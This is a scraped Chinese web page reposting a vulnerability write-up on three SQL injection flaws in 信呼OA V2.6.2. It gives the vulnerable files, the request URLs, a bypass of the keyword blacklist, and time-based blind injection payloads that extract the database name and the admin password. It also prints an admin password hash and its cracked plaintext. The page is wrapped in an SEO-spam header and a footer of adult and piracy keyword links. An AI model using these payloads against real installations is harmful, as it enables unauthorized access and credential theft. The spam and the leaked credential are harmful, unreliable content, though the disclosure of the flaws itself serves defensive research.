91网首页-91网页版-91网在线观看-91网站免费观看-91网站永久视频-91网站在线播放

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

信呼OA_V2.6.2_SQL注入漏洞

admin
2025年5月28日 19:18 本文熱度 273

No.1

SQL注入-1


代碼審計

漏洞點出在 

/webmain/flow/input/mode_gongAction.php 

下的 submittoupiaoAjax 方法



可以發現它對傳入參數沒有進行任何的過濾便拼接執行 SQL 注入

(PS:雖然 get 和 post 請求進行了全局過濾,但過濾不嚴可以繞過)

url:
http://localhost/index.php?a=submittoupiao&m=mode_gong|input&d=flow&ajaxbool=true&mid=3&sid=1&modenum=1

通過跟蹤 SQL 執行,可以看到實際上執行的是以下 sql 語句

update `xinhu_infors` set `touci`=`touci`+1 where `mid`=3 and `id` in(1)

其中 $mid 和 $sid 我們都可以進行注入,此處我選擇 $mid 進行注入

不過它 get 和 post 傳參過濾了很多參數(已經喪心病狂到影響內容的程度了...)

select,alter,delete,drop,update,/*,*/,insert,from,time_so_sec,convert,from_unixtime,unix_timestamp,curtime,time_format,union,concat,information_schema,group_concat,length,load_file,outfile,database,system_user,current_user,user(),found_rows,declare,master,exec,(),select*from,select

但黑名單總是不如白名單的,所以簡單 bypass 下得出以下 poc

3||if(ascii(substr((select(database())),1,1))=114,benchmark(666666666,1),0)#


嘗試注出當前數據庫名

3||if(ascii(substr((select(database())),1,1))=114,benchmark(666666666,1),0)#



第一個字符為 r

3||if(ascii(substr((select(database())),2,1))=110,benchmark(666666666,1),0)#


3||if(ascii(substr((select(database())),2,1))=111,benchmark(666666666,1),0)#



第二個字符為 o

最后注入出當前數據庫為 rockxinhu

除此之外,使用以下 poc 還可以注出管理員密碼:

/index.php?a=submittoupiao&m=mode_gong|input&d=flow&ajaxbool=true&mid=0||IF(ASCII(SUBSTR((SELECT(pass)FROM(`xinhu_admin`)WHERE(id=1)),1,1))=98,BENCHMARK(666666666,1),0)#&sid=1&modenum=1




No.2

SQL注入-2


代碼審計

漏洞點出在 

/webmain/flow/input/mode_knowtraimAction.php

 下的 biaoshiAjax 方法



可以發現它對傳入參數沒有進行任何的過濾便拼接執行 SQL 注入

url:

http://localhost/index.php?d=flow&m=mode_knowtraim|input&a=biaoshi&ajaxbool=trueupdate `xinhu_knowtrais` set`kssdt`=null,`ksedt`=null,`fenshu`='0',`kstime`='0',`isks`='0',`tkids`=null,`dyids`=null,`dyjgs`=null where `id` in(1) and `mid` in(select `id` from`[Q]knowtraim` where `state`<>

通過跟蹤 SQL 執行,可以看到實際上執行的是以下 sql 語句

其中 $fid 我們可以進行注入

select,alter,delete,drop,update,/*,*/,insert,from,time_so_sec,convert,from_unixtime,unix_timestamp,curtime,time_format,union,concat,information_schema,group_concat,length,load_file,outfile,database,system_user,current_user,user(),found_rows,declare,master,exec,(),select*from,select*

bypass 下得出以下 poc

1)&&IF(1=1,BENCHMARK(666666666,1),0)#


嘗試注出管理員密碼

1)&&IF(ascii(substr((select(pass)from(`xinhu_admin`)where(id=1)),1,1))=98,BENCHMARK(666666666,1),0)#


得到第一個字符為 'b

1)&&IF(ascii(substr((select(pass)from(`xinhu_admin`)where(id=1)),2,1))=98,BENCHMARK(666666666,1),0)#
1)&&IF(ascii(substr((select(pass)from(`xinhu_admin`)where(id=1)),2,1))=49,BENCHMARK(666666666,1),0)#


得到第二個字符為 '1

最后得到管理員的密碼為:b13d93cd920d4155634eae0cc2e71c78

解密后是:Aa635241



No.3

SQL注入-3



代碼審計


漏洞點出在 

/webmain/flow/input/mode_userAction.php

 下的 editsuperAjax 方法



可以發現它對傳入參數沒有進行任何的過濾便拼接執行 SQL 注入

url:

http://localhost/index.php?d=flow&m=mode_user|input&a=editsuper&ajaxbool=true

通過跟蹤 SQL 執行,可以看到實際上執行的是以下 sql 語句

update `xinhu_admin` set `superid`='1',`superman`='1' where `id` in(1) and idnot in(1)

其中 $sid 和 $xid 我們都可以進行注入,此處我選擇 $xid 進行注入

不過它 get 和 post 傳參過濾了很多參數(已經喪心病狂到影響內容的程度了...)

select,alter,delete,drop,update,/*,*/,insert,from,time_so_sec,convert,from_unixtime,unix_timestamp,curtime,time_format,union,concat,information_schema,group_concat,length,load_file,outfile,database,system_user,current_user,user(),found_rows,declare,master,exec,(),select*from,select*

但黑名單總是不如白名單的,所以簡單 bypass 下得出以下 poc

1)&&IF(1=1,BENCHMARK(666666666,1),0)#


嘗試注出當前數據庫

1)&&IF(ASCII(SUBSTR(DATABASE(),1,1))=114,BENCHMARK(666666666,1),0)#


得到第一個字符為 'r'

1)&&IF(ASCII(SUBSTR(DATABASE(),2,1))=114,BENCHMARK(666666666,1),0)#


1)&&IF(ASCII(SUBSTR(DATABASE(),2,1))=111,BENCHMARK(666666666,1),0)#



得到第二個字符為 'o

最后得到當前數據庫為:rockxinhu



No.4

網安溝通交流群


?


閱讀原文:https://mp.weixin.qq.com/s/DTLPhx7tuKgsu3i_Cz6GYw


該文章在 2025/5/29 11:40:29 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 国产激情影视在线 | 精品亚洲aⅴ导航 | 国产国产乱老熟女视 | 欧美日韩免费在线 | 绿巨人视频官网在线 | 日韩插穴| 欧美在线观看视 | 国产精品一区二区三 | 含羞草影院在线 | 日本免费成人VA | 日韩欧美国产aⅴ | 91高清国 | 韩精品欧美综合区 | 国语我和子的乱视频 | 91精品视频免费看 | 国产色秀视| 国产激情一区二区 | 午夜免费体验 | 欧美性性性性 | 欧美日韩国产一区二 | 日韩欧美国产aⅴ | 制服丝袜诱惑在线 | 97ssee| 日本5级床片全免费 | 精品美脚玉足 | 成人激情午夜免费网 | 国产综合日韩 | 麻花豆传媒mv在 | 国产精品视频一区二 | 精品成免费视频9 | 国产偷国产偷亚洲高 | 成人国产精品日韩 | 国产老熟女网站 | 午夜免费体验 | 国产精品第1页 | 国产最新电影在线观 | 国产二区色综合 | 最新上映电影免费抢先 | 中文字幕一区 | 福利精品视频 | 精品影片 |